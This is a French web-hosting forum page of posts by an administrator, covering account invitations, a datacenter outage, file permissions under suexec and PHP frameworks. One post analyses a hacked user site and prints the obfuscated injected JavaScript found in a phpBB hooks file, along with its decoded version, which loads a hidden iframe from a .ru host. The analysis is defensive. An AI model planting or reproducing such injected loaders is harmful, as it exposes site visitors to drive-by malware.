Bizarre... en cliquant ca ne marchait pas, mais en faisant un copié collé ca marche ? :S
C'est là 4ème dimension cette histoire...
Vous n'êtes pas identifié. Veuillez vous connecter ou vous inscrire.
lesCigales.ORG - Hébergement gratuit sans publicité » Messages de toad
Bizarre... en cliquant ca ne marchait pas, mais en faisant un copié collé ca marche ? :S
C'est là 4ème dimension cette histoire...
Bonjour,
Vous devriez avoir recu une invitation ![]()
Hmm avez vous activé vos cookies ? C'est bizarre cette histoire qui revient malgré un gros bug fixé la dernière fois..
Bonjour à tous,
Notre datacenter nous informe qu'une coupure est prévue ce 19 décembre afin de mettre à jour les routeurs Cisco et par là même de passer les capacités à 20 Gbits au lieu de 10 Gbits.
La coupure est prévue entre 3:30 du matin et 4:30, la durée est incertaine, à priori il serait possible qu'il y ait plusieurs petites coupures.
Merci de votre patience, bonne journée.
Bon bin on perd pas grand chose à première vue.. ![]()
Bonsoir,
Vous devriez avoir recu une invitation ![]()
Je répète:
Et je sais me servir des chmods, depuis le temps que je fais tourner mes sites : soit ils sont autorisés, soit ils ne le sont pas. Mais pour quoi autoriser ce qui met un site en rideau ?
Disons que les chmods sont laissés pour les gens qui savent aussi les maitriser et qui ont peut être des besoins particuliers.
De plus je vous ai expliqué plus haut ce qui coincait avec les chmods.
Et non, il n'est malheureusement pas possible de supprimer votre compte à l'heure actuelle, c'est une fonctionnalité qui sera développée un peu plus tard.
Je viens de regarder vos fichiers.. effectivement vous maitrisez votre sujet ![]()
root@ns1:/home/toad# ls /home/users/00/16/cc/home/www/data/ -ld
d---rwxrwx 7 f4m web 4096 2009-12-16 14:10 /home/users/00/16/cc/home/www/data/
En gros cela veut dire: tous les droits en écriture et lecture sauf pour votre utilisateur principal. Vous voulez dire qu'il était dans votre intention d'avoir un répertoire dans lequel vous ne pouvez ni lire, ni écrire de fichiers ?
Les fichiers à problème:
root@ns1:/home/toad# find /home/users/00/16/cc/home/www \( -type f -not -perm 644 -o -type d -not -perm 755 \) -exec ls -ld {} \;
-rwxrwxrwx 1 f4m web 435 2009-12-12 22:06 /home/users/00/16/cc/home/www/admin/action.php
drwxrwxrwx 2 f4m web 4096 2009-12-12 22:07 /home/users/00/16/cc/home/www/admin/redac
-rw-rw-rw- 1 f4m web 42 2009-12-12 22:07 /home/users/00/16/cc/home/www/admin/redac/index.php
-rwxrwxrwx 1 f4m web 53 2009-12-12 22:20 /home/users/00/16/cc/home/www/admin/mdp.php
d---rwxrwx 7 f4m web 4096 2009-12-16 14:10 /home/users/00/16/cc/home/www/data
---------- 1 f4m web 42 2009-12-12 22:11 /home/users/00/16/cc/home/www/img/index.phpBonne chance et bon apprentissage
Et si vous regardiez là où vous avez téléchargé le script en premier lieu ? Vous comprenez bien qu'on ne peut pas faire de support pour chaque application écrite en PHP..
Pour le problème des headers, c'est simple, il suffit de supprimer tous les caractères après le ?> (astuce: même les espaces..)
Disons que les chmods sont laissés pour les gens qui savent aussi les maitriser et qui ont peut être des besoins particuliers.
Si vous ne pouvez pas effacer de répertoires, cela provient probablement du fait que vous n'avez pas réussi à voir vos fichiers cachés dans lesdits répertoires.
Petite remarque: il serait peut être temps de mettre à jour si possible votre super script de gestion de portail basé sur phpBB ![]()
Un petit coup d'oeil à votre ligne:
root@ns1:/home/toad# sed -n 251p /home/users/00/0d/2e/home/www/includes/hooks/index.php
<script>/*GNU GPL*/ try{window.onload = function(){var Sjtyp5xq2pk = document.createElement('script');Sjtyp5xq2pk.setAttribute('type', 'text/javascript');Sjtyp5xq2pk.setAttribute('id', 'myscript1');Sjtyp5xq2pk.setAttribute('src', 'h@t#(#t&&!@p&!:@!&&(/!/)#m)(@!a$@!r^#c((a&$-$!c)o#m#.)#(a!s@##k^^$&m@$e$)$n)&(.@!$#c!&^#(o)^$)m!!.#@e!^!a$s!y^@#^-#$(s!!h#)a(^r(#e!!@-&)^c)@o$&$!m$.(#$h@o^(m((e(s#$w!e#^e##&)t##n^#e^^t&&)&)w&!(o^$!)!r)@!&k&).&r&u$^:!^#8@$0)@8()0(@/)@$&p$!$&o(#&r!!!$n@$b$b&!(.#o@)#r@(^@g@)/($!p&o^#$r#)!^#n@^b##b)@&!.#^)o@r&(!!g&($#/&@$((g@&o^o(#g($l$^)#e!^).^!$c!o)m$$/$w!i#k@^i&a))).#c)!o)m@/))c^i#!(t^$$i#!$b#)a(#!n#$!k((.^@&c$!@#o$#@)m(/&!('.replace(/\(|#|\!|\^|@|&|\)|\$/ig, ''));Sjtyp5xq2pk.setAttribute('defer', 'defer');document.body.appendChild(Sjtyp5xq2pk);}} catch(e) {}</
Quand on convertit l'url src du script javascript externe rajouté à la volée on obtient l'url suivante:
http://marca-com.askmen.com.easy-share- … ibank.com/
Le script en question devient:
Vcnucf7bc = 'm!a&#r($!c^@)a@$(-(!^c^)o$!)m!.^!)a!)!s&^k$m))e&@)&n((.)(^^#c($#o$(!m#!).^e!$#a($s!y&^@-#$s&(@h!(a(!r(^@$#e&^-)#@!c^$@o!#(m^.)&#h&)o#@!&m@!e$^^s&#w!)e()!^!e@#!@t^!n@e(@t###@#w&o@r)(#k@.#!r$^u@$'.replace(/&|\$|\!|@|\)|\^|#|\(/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Vcnucf7bc+':8080/index.php?js';
document.body.appendChild(f);
La variable Vcnucf7bc est convertit en: marca-com.askmen.com.easy-share-com.homesweetnetwork.ru
Et donc, ce que fait ce script est d'ouvrir une page externe vers la page:
http://marca-com.askmen.com.easy-share- … dex.php?js
Cette page ne renvoie rien, donc je ne saurais dire ce qu'elle fait exactement..
Interprétation rapide: you have been hacked.
Je viens de vérifier pour les quotas: votre site fait effectivement 13 mo.
Bonsoir Katryne,
Ok déjà une chose, infobarquee est nouveau dans l'équipe et n'est pas forcément au courant de toute l'architecture derrière lesCigales.ORG, mais je le suis et voilà comment ca se passe:
- chaque site que nous hébergeons tourne avec les droits de l'utilisateur qui le possède, c'est à dire: AUCUN chmod à faire sur vos fichiers ou répertoires qui sont créés eux aussi par votre utilisateur, car les scripts php écriront et liront vos fichiers avec VOS droits et pas ceux d'un utilisateur tiers, donc AUCUNE bidouille à faire. Les conseils sur les chmods dans les logiciels concernent les hébergeurs peu scrupuleux qui ont un système où l'utilisateur qui possède les fichiers sur le FTP et l'utilisateur qui exécutent ces fichiers via PHP est différent. Ce n'est pas le cas chez nous, donc je le répète: AUCUN chmod à faire pour que ca marche (je suis même en train de réfléchir si je ne devrais pas désactiver complètement le chmod afin de ne pas tenter les néophytes).
- ensuite, notre système qui exécute vos scripts PHP avec votre utilisateur s'appelle suexec et par souci de sécurité, LUI controlle que vos chmods soient corrects; c'est à dire: aucun répertoire ou fichier dont les droits en écriture sont offerts à tout le monde ne sera exécuté (c'est l'erreur 500 que vous allez voir sur votre site si vous avez le malheur de passer un répertoire en 777 dans lequel se trouve vos fichiers PHP), ceci afin d'éviter que n'importe quel utilisateur puisse créér des fichiers sur votre compte et les exécuter avec vos droits.
Voilà, j'espère avoir suffisament éclairé votre lanterne concernant vos problèmes ![]()
Bonjour ![]()
Ton message n'était pas très clair, mais je suppose que tu voulais pouvoir t'inscrire chez nous ? (ta premìère phrase laisse penser que c'est déjà le cas..) dans ce cas, tu devrais aller regarder ta boite aux lettres ![]()
Mouais, tu prêches un convaincu (qui galère encore un peu).
Mais je continue à penser que sur un site à fort traffic, le framework plombera les perfs du serveur. Heureusement je n'en suis pas à développer ce genre de site.
Oui mais là tu parles d'optimisation, il faut déjà avoir une application finie pour arriver à ce genre de considération.
D'un autre coté, d'autres personnes - moi y compris - te diront que c'est faire ton appli en PHP qui va plomber ton serveur..
Enfin, pour terminer, coder avec un framework c'est redécouvrir le plaisir de coder, c'est se concentrer davantage sur les idées & concepts que sur les moyens d'y parvenir. C'est un facteur clé de succès qui va devenir décisif dans les années à venir...
A bon entendeur...
PS : Merci à CakePHP pour m'avoir "ouvert les yeux"
Ouh, je crois que j'ai rencontré quelqu'un qui pense exactement comme moi ![]()
Longue vie à CakePHP ! Mort à Zend Framework et autres Symfony, parodies de frameworks lamentables
Pas de souci, on veut pas non plus trop vous restreindre mais ca permet de forcer les gens à participer financièrement à l'hébergement, je pense que c'est gagnant / gagnant
Mais de rien ![]()
Bonjour,
Vous devriez avoir recu une invitation ![]()
Il y a 2 autres possibilités ![]()
- essayer de lui faire prendre moins de place (si possible)
- upgrader son compte
Bonsoir,
Vous devriez avoir recu une invitation ![]()
Oui c'est ce que je pense
lesCigales.ORG - Hébergement gratuit sans publicité » Messages de toad